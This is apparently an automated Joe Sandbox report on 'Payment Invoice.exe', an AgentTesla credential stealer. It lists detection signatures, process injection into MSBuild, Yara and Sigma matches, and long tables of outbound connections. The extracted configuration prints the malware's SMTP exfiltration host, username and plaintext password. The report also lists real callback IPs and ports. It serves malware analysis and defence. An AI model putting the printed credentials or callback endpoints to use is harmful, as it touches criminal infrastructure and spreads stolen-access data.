Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Invoice.exe

Overview

General Information

Sample name:Payment Invoice.exe
Analysis ID:1406718
MD5:d1eefb267668753dff23ce54649b9696
SHA1:38c9e193192296d65e1394b9ca4eebc11ae7d019
SHA256:58791f58859f7be4cca86b0f64295109177b54d92d4286f8fa7dccaf72cc09b7
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Yara detected AgentTesla
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment Invoice.exe (PID: 7076 cmdline: C:\Users\user\Desktop\Payment Invoice.exe MD5: D1EEFB267668753DFF23CE54649B9696)
    • MSBuild.exe (PID: 42988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 43000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 43064 cmdline: C:\Windows\system32\WerFault.exe -u -p 7076 -s 101532 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.orako.co.ke", "Username": "ibiza@orako.co.ke", "Password": "ao655d3dSP[{"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.3068273455.00000000028B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000005.00000002.3065106741.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.3068273455.00000000028DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            5.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.MSBuild.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x34edf:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x34f51:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x34fdb:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3506d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x350d7:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x35149:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x351df:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x3526f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                Networking

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 34.195.165.88, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 42988, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55268

                System Summary

                barindex
                Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 119.91.214.119, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\Payment Invoice.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51328
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.201, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\Desktop\Payment Invoice.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49901
                Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 172.67.74.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 42988, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 55260
                Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 5.161.103.41, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\Payment Invoice.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 51966
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 103.141.66.78, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\Payment Invoice.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 160.248.80.91, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Payment Invoice.exe, Initiated: true, ProcessId: 7076, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49744
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 5.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.orako.co.ke", "Username": "ibiza@orako.co.ke", "Password": "ao655d3dSP[{"}
                Source: Payment Invoice.exeReversingLabs: Detection: 44%
                Source: Payment Invoice.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:51252 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.4:54268 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:55260 version: TLS 1.2
                Source: Payment Invoice.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: global trafficTCP traffic: Count: 11 IPs: 212.110.188.222,212.110.188.189,212.110.188.211,212.110.188.213,212.110.188.202,212.110.188.198,212.110.188.220,212.110.188.193,212.110.188.195,212.110.188.216,212.110.188.207
                Source: global trafficTCP traffic: Count: 12 IPs: 103.47.93.236,103.47.93.225,103.47.93.219,103.47.93.216,103.47.93.194,103.47.93.25,103.47.93.221,103.47.93.210,103.47.93.242,103.47.93.231,103.47.93.220,103.47.93.252
                Source: global trafficTCP traffic: Count: 15 IPs: 188.132.222.171,188.132.222.194,188.132.222.141,188.132.222.7,188.132.222.167,188.132.222.9,188.132.222.3,188.132.222.52,188.132.222.5,188.132.222.40,188.132.222.51,188.132.222.39,188.132.222.38,188.132.222.12,188.132.222.14
                Source: global trafficTCP traffic: Count: 10 IPs: 72.10.160.170,72.10.160.91,72.10.160.90,72.10.160.174,72.10.160.173,72.10.160.172,72.10.160.171,72.10.160.93,72.10.160.92,72.10.160.94
                Source: global trafficTCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.14,184.178.172.25,184.178.172.17,184.178.172.28,184.178.172.3,184.178.172.5,184.178.172.18
                Source: global trafficTCP traffic: 103.216.51.36 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 62.171.131.101 ports 41055,25847,44827,29497,2,4,5,7,8
                Source: global trafficTCP traffic: 45.11.95.166 ports 6012,6014,6003,6002,6005,6004,6015,0,1,4,6,6009,6008
                Source: global trafficTCP traffic: 173.212.209.216 ports 27138,1,2,3,7,8
                Source: global trafficTCP traffic: 45.11.95.165 ports 6010,6012,5034,5045,5212,5036,5213,5040,1,2,5,5038,5214,5039,5219
                Source: global trafficTCP traffic: 207.180.234.220 ports 45876,48963,39323,42823,36946,3,6,7,39737,37736
                Source: global trafficTCP traffic: 67.213.210.118 ports 2,58703,4,5,9,54924
                Source: global trafficTCP traffic: 132.148.245.247 ports 7183,1,60349,3,26295,7,8
                Source: global trafficTCP traffic: 107.180.95.177 ports 64731,63951,1,3,5,6,9,7128,1405
                Source: global trafficTCP traffic: 148.72.23.56 ports 42312,36111,3260,0,6,60069,9,4833
                Source: global trafficTCP traffic: 164.92.86.113 ports 64110,63358,62987,57391,1,55651,3,5,7,9,50564,60283
                Source: global trafficTCP traffic: 162.214.102.195 ports 34227,2,56755,3,4,7,60891,50366
                Source: global trafficTCP traffic: 203.96.177.211 ports 12183,43839,3,4,5,55005,8,48553,15901
                Source: global trafficTCP traffic: 107.180.88.173 ports 44568,0,2,5,35774,59820,8,9,36503
                Source: global trafficTCP traffic: 162.241.6.97 ports 41274,46783,44607,59991,45629,0,31794,4,6,50563,7,60651
                Source: global trafficTCP traffic: 72.167.38.7 ports 15410,45650,0,1,2,8,9,19802
                Source: global trafficTCP traffic: 162.241.158.204 ports 63360,41274,46783,44607,59991,1,31794,2,4,52980,50563,7,60651
                Source: global trafficTCP traffic: 37.187.77.58 ports 64494,14470,49507,21861,59870,0,52593,31355,1,3139,7,18936,13412,13574,37920,19767,10710,29380
                Source: global trafficTCP traffic: 92.204.135.37 ports 26927,63462,16591,8623,22942,0,62969,1,58604,5,9,20491,55019,34824,32524,33899
                Source: global trafficTCP traffic: 82.223.121.72 ports 15464,64871,11075,27137,4,5,56002,8,9,4985
                Source: global trafficTCP traffic: 72.10.160.90 ports 18333,29967,23685,29129,29529,1811,2589,24397,10055,17893,29919,21011,9335,29813,3051,29517,0,1,3601,29197,3,5,9,16205,4337,30951
                Source: global trafficTCP traffic: 72.10.160.92 ports 28709,5123,5,26077,7,5775
                Source: global trafficTCP traffic: 72.10.160.170 ports 5385,5321,26887,29585,3,31571,28257,5,8,3801
                Source: global trafficTCP traffic: 72.10.160.173 ports 0,1,1795,6,7,10677
                Source: global trafficTCP traffic: 72.10.160.171 ports 2881,26315,1,2,3,31571,5,6,5369
                Source: global trafficTCP traffic: 62.182.114.164 ports 2,3,5,6,59623,9
                Source: global trafficTCP traffic: 51.222.241.157 ports 40351,22538,44029,51718,36363,27206,0,1,3,4,5,30011,2563,46286
                Source: global trafficTCP traffic: 162.214.90.49 ports 51918,0,4,5,58740,7,8,46430
                Source: global trafficTCP traffic: 128.199.221.91 ports 7176,49865,8004,33383,21605,4,5,6,8,9
                Source: global trafficTCP traffic: 160.248.80.91 ports 8080,2525,587,5,7,8,80
                Source: global trafficTCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
                Source: global trafficTCP traffic: 163.172.131.178 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 167.172.109.12 ports 39452,46249,39533,37355,40825,3,5,7,41491
                Source: global trafficTCP traffic: 88.211.85.169 ports 42931,1,2,3,4,9
                Source: global trafficTCP traffic: 107.180.88.41 ports 37597,62578,24834,2,3,4,58037,57642,8
                Source: global trafficTCP traffic: 162.214.227.68 ports 43435,48414,63112,45540,34071,55392,0,1,3,4,55029,31042,60433,7,54047,56796,31825,37976,51923,52208
                Source: global trafficTCP traffic: 148.72.206.84 ports 2536,2,3,5,6,58842
                Source: global trafficTCP traffic: 207.180.198.241 ports 42581,37443,45718,1,2,57327,4,60148,5,8,17228,37209
                Source: global trafficTCP traffic: 161.97.163.52 ports 64120,9045,18693,40301,32092,64109,0,30189,1,2,1798,31125,4,22040,34586,6,29631,55109,34916
                Source: global trafficTCP traffic: 162.241.137.197 ports 0,2,34455,6,60200,36534,61041
                Source: global trafficTCP traffic: 91.142.222.84 ports 22735,57041,2,3,5,7,12266,55718
                Source: global trafficTCP traffic: 103.28.121.58 ports 1,2,3,3128,8,80
                Source: global trafficTCP traffic: 83.151.4.172 ports 47036,0,3,4,6,7
                Source: global trafficTCP traffic: 41.33.203.115 ports 1,1974,1973,4,7,9
                Source: global trafficTCP traffic: 131.0.87.225 ports 0,1,2,5,7,52017
                Source: global trafficTCP traffic: 98.162.25.29 ports 1,3,6,7,9,31679
                Source: global trafficTCP traffic: 51.158.77.220 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.214.225.223 ports 37581,54917,43435,63452,49227,43265,49806,34071,58240,40536,0,36129,53340,4,55029,6,8,9,50753,39824
                Source: global trafficTCP traffic: 51.222.241.8 ports 36219,1,2,62916,6,9
                Source: global trafficTCP traffic: 103.35.189.217 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 86.110.189.118 ports 42539,2,3,4,5,9
                Source: global trafficTCP traffic: 162.241.50.179 ports 49858,40179,34099,3,6,7,8,48156,37876,53755,31414,35948
                Source: global trafficTCP traffic: 51.158.108.134 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 163.172.137.49 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 51.158.124.167 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 103.212.93.241 ports 45639,3,4,5,6,9
                Source: global trafficTCP traffic: 108.181.132.117 ports 34560,0,3,4,5,6
                Source: global trafficTCP traffic: 146.59.18.246 ports 9755,15860,40975,25810,0,30673,4,5,7,9,49871
                Source: global trafficTCP traffic: 148.66.130.53 ports 8268,31907,7830,56350,23998,0,3,5,6,47891,13305,54209
                Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,0,2,25492,14738,4,50781,5,22450
                Source: global trafficTCP traffic: 51.158.108.165 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 51.89.173.40 ports 17982,27887,3100,44719,26545,23313,54570,23854,20435,1,30199,55198,60775,5,8,51511,9,11058,31724
                Source: global trafficTCP traffic: 206.189.145.23 ports 49614,63625,59867,1,4,6,9
                Source: global trafficTCP traffic: 167.86.102.169 ports 1,2,3,6,8,16823
                Source: global trafficTCP traffic: 147.75.92.251 ports 9401,0,1,4,9,10010,10089
                Source: global trafficTCP traffic: 159.223.71.71 ports 59243,56581,59098,2,3,4,61818,59159,52542,5,51187,60377,9,51616
                Source: global trafficTCP traffic: 34.93.157.87 ports 21802,0,1,2,8,8514
                Source: global trafficTCP traffic: 146.59.147.11 ports 62801,0,1,2,6,8
                Source: global trafficTCP traffic: 213.136.79.177 ports 38772,5189,64556,32930,2,3,35358,7,8,13675
                Source: global trafficTCP traffic: 217.52.247.86 ports 1976,1,6,1981,7,9
                Source: global trafficTCP traffic: 45.77.111.135 ports 15082,0,1,2,5,8
                Source: global trafficTCP traffic: 38.54.95.19 ports 8060,0,3128,9080,8,9
                Source: global trafficTCP traffic: 109.75.34.152 ports 59341,1,3,4,5,9
                Source: global trafficTCP traffic: 162.214.121.173 ports 64579,44826,35183,4,5,6,33572,7,9,52577,64382
                Source: global trafficTCP traffic: 20.24.43.214 ports 8123,1,2,3,8,80
                Source: global trafficTCP traffic: 202.40.181.220 ports 1,2,31247,3,4,7
                Source: global trafficTCP traffic: 92.205.61.38 ports 21286,4300,36073,1,2,24183,3,4,8
                Source: global trafficTCP traffic: 162.241.46.40 ports 64353,49401,56241,61579,0,1,4,9,46097
                Source: global trafficTCP traffic: 46.105.44.29 ports 64523,2,3,4,5,6
                Source: global trafficTCP traffic: 195.154.43.184 ports 19058,0,1,5,8,9
                Source: global trafficTCP traffic: 64.227.108.182 ports 14287,1,2,4,7,8
                Source: global trafficTCP traffic: 41.65.55.10 ports 1976,1,6,1981,7,9
                Source: global trafficTCP traffic: 208.109.14.49 ports 46047,37377,22881,1,2,50540,8,42072
                Source: global trafficTCP traffic: 5.252.23.249 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 38.54.116.9 ports 8080,1,2,3,3128,8,8118
                Source: global trafficTCP traffic: 45.117.179.179 ports 6522,14791,27836,2,35942,5,6,55606
                Source: global trafficTCP traffic: 203.161.32.242 ports 61070,0,4,5,6,50640,52903
                Source: global trafficTCP traffic: 104.128.103.32 ports 64312,1,2,3,4,6
                Source: global trafficTCP traffic: 163.172.147.9 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 163.172.165.36 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 132.148.128.88 ports 26606,8595,29745,20317,2,4,5,29313,7,9
                Source: global trafficTCP traffic: 5.252.23.220 ports 1080,1081,0,1,3128,8
                Source: global trafficTCP traffic: 58.234.116.197 ports 8193,8197,1,7,8,80,9
                Source: global trafficTCP traffic: 51.15.234.222 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 94.23.220.136 ports 43751,25256,2,5,6,29295
                Source: global trafficTCP traffic: 162.241.46.6 ports 41442,62244,60708,34172,0,50062,2,53477,5,6,46097
                Source: global trafficTCP traffic: 162.241.53.72 ports 57495,57364,3,4,5,6,7,53755,62192
                Source: global trafficTCP traffic: 162.215.219.157 ports 41697,48117,1,4,7,8
                Source: global trafficTCP traffic: 147.124.212.31 ports 11070,13276,0,1,24230,7,16844,30479,36779,51825
                Source: global trafficTCP traffic: 121.139.218.165 ports 0,1,3,4,9,31409
                Source: global trafficTCP traffic: 216.10.242.18 ports 40571,15881,0,1,4,5,7,30670
                Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,45883,3230,26305,23667,56225,30026,4,5,8,53777,7999
                Source: global trafficTCP traffic: 51.158.96.66 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 43.255.113.232 ports 8082,8083,5,8,80,84,85
                Source: global trafficTCP traffic: 103.176.116.171 ports 0,2,3,32650,5,6
                Source: global trafficTCP traffic: 161.97.170.209 ports 24606,1,2,6,9,62291
                Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 147.75.34.86 ports 0,10008,1,10007,3,10000,80,10003
                Source: global trafficTCP traffic: 104.247.163.246 ports 54094,3825,2,3,5,8
                Source: global trafficTCP traffic: 185.45.194.176 ports 27639,2,3,6,7,9
                Source: global trafficTCP traffic: 92.204.134.38 ports 52929,25825,9375,15393,7785,42571,25675,29718,3,1555,56177,5,54467,28695,7,51123,30747,9
                Source: global trafficTCP traffic: 52.67.10.183 ports 1,2,3,3128,8,80
                Source: global trafficTCP traffic: 128.199.196.31 ports 21049,0,1,2,27102,7,33661,38832,57715
                Source: global trafficTCP traffic: 88.202.230.103 ports 17045,8896,0,1,13638,4,5,7
                Source: global trafficTCP traffic: 51.15.254.129 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.144.36.208 ports 27829,38242,2,3,4,27531,8
                Source: global trafficTCP traffic: 198.23.229.203 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 132.148.245.169 ports 19483,1,3,7,8,38117
                Source: global trafficTCP traffic: 72.167.222.113 ports 12581,2,4,8,4125,9,48892
                Source: global trafficTCP traffic: 67.43.227.228 ports 19599,15079,13141,9039,0,3,26353,9
                Source: global trafficTCP traffic: 67.43.227.227 ports 28723,25127,23973,9053,32445,1,4,2411,7,14751,8811,4711,1959,13537,12723,29095,10049
                Source: global trafficTCP traffic: 67.43.227.226 ports 25639,5791,15143,28847,2,3,5,6,9
                Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,2,54395,5,18636
                Source: global trafficTCP traffic: 51.68.164.77 ports 16892,2,3,4,8,54504,32824
                Source: global trafficTCP traffic: 159.223.166.21 ports 5078,5199,1372,21898,1,2,3,25154,7,47460
                Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50687,50109
                Source: global trafficTCP traffic: 67.43.227.230 ports 23685,25491,1,2,4,5,9
                Source: global trafficTCP traffic: 94.131.106.196 ports 1080,1,2,3,3128,8
                Source: global trafficTCP traffic: 75.119.145.169 ports 38023,61344,61553,1,3,4,6
                Source: global trafficTCP traffic: 43.155.165.196 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 67.43.228.254 ports 1,2,32221,7,28971,8,9
                Source: global trafficTCP traffic: 67.43.228.253 ports 14493,7853,26323,24279,0,1,26087,14869,3,31033,28993,5633,1807,6879,3933,9827
                Source: global trafficTCP traffic: 67.43.228.252 ports 4495,4,1499,5,28695,9
                Source: global trafficTCP traffic: 67.43.228.251 ports 24279,0,11339,2,26087,6,7,1265,8
                Source: global trafficTCP traffic: 104.248.158.78 ports 47225,62952,61725,2,5,6,9
                Source: global trafficTCP traffic: 119.81.71.27 ports 8123,1,2,3,8,80
                Source: global trafficTCP traffic: 23.95.209.142 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 92.204.136.149 ports 16691,25137,1,16928,6,53035,9
                Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,1,64938,2,4,29544,6,39458,2906,16203,4734,12446
                Source: global trafficTCP traffic: 132.148.167.231 ports 46983,3,4,6,8,9
                Source: global trafficTCP traffic: 198.12.255.193 ports 22785,1,2,6,8,6821,51612
                Source: global trafficTCP traffic: 51.161.131.84 ports 63055,25843,43712,0,58612,2,4,49202,9,19987
                Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,80,9,81,82,9999,8828
                Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,3,11802,4,35632,6,34144,9,4228,37847
                Source: global trafficTCP traffic: 211.222.252.187 ports 8193,8080,8197,1,3,8,80,9
                Source: global trafficTCP traffic: 186.215.87.194 ports 8893,6034,8891,6022,0,2,6,6029
                Source: global trafficTCP traffic: 37.32.98.160 ports 3,5,7,8,8998,37758
                Source: global trafficTCP traffic: 132.148.129.254 ports 9553,0,1,6,7,8,60781
                Source: global trafficTCP traffic: 195.154.243.38 ports 4,5,6,8,9,49685
                Source: global trafficTCP traffic: 64.227.108.25 ports 31908,0,1,3,8,9
                Source: global trafficTCP traffic: 67.43.236.18 ports 17145,13087,7797,22645,1,30333,4,5,7,5879
                Source: global trafficTCP traffic: 135.148.10.161 ports 51507,41146,3970,0,31696,1,5,7,6716
                Source: global trafficTCP traffic: 213.136.78.200 ports 28513,1,2,3,5,8,19925
                Source: global trafficTCP traffic: 67.43.236.20 ports 3335,26693,31295,5239,31733,8705,6705,24725,20001,25917,13175,6961,3011,12627,1,16829,2,3,2973,5,3389,10363,9,18129
                Source: global trafficTCP traffic: 72.10.164.178 ports 13341,30717,18067,11251,22017,0,1,1403,10801,2675,6,1431,7,8,13477,1929,30911,5931,29471,10235,5935,8837,5529
                Source: global trafficTCP traffic: 43.129.228.46 ports 7891,7890,1,7,8,9
                Source: global trafficTCP traffic: 171.244.140.160 ports 15141,13391,5189,62310,14253,24015,0,3,4,27056,7,37400,53749
                Source: global trafficTCP traffic: 95.217.104.21 ports 24815,1,2,4,5,8
                Source: global trafficTCP traffic: 51.158.64.130 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.214.197.102 ports 51918,42019,0,4,5,58740,7,8
                Source: global trafficTCP traffic: 142.4.7.20 ports 43100,0,1,10722,3,4
                Source: global trafficTCP traffic: 163.172.171.22 ports 1,3,6,7,9,16379
                Source: global trafficTCP traffic: 162.144.121.232 ports 16795,24787,2,27262,6,7,19404
                Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,2572,56495,57320,27207,9141,0,32896,32588,53012,2,11946,30895,7,8879,5401,12217,49042
                Source: global trafficTCP traffic: 160.153.245.187 ports 38586,3,35138,59786,5,6,8,6116,5436,31745
                Source: global trafficTCP traffic: 72.195.34.60 ports 1,2,3,7,9,27391
                Source: global trafficTCP traffic: 43.131.245.216 ports 15673,1,3,5,6,7
                Source: global trafficTCP traffic: 170.244.64.12 ports 31476,1,3,4,6,7
                Source: global trafficTCP traffic: 45.81.232.17 ports 27855,59421,54393,9165,23711,0,4,5,6,7,23363,47056,21481,17639,14669,48085
                Source: global trafficTCP traffic: 92.205.110.118 ports 42086,18374,15430,0,1,3,26570,4,5,53903
                Source: global trafficTCP traffic: 51.15.142.4 ports 1,3,6,7,9,16379
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 30951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 31033
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 26315
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 55019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 37847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 10710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 5775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 59870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 26353
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 17145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
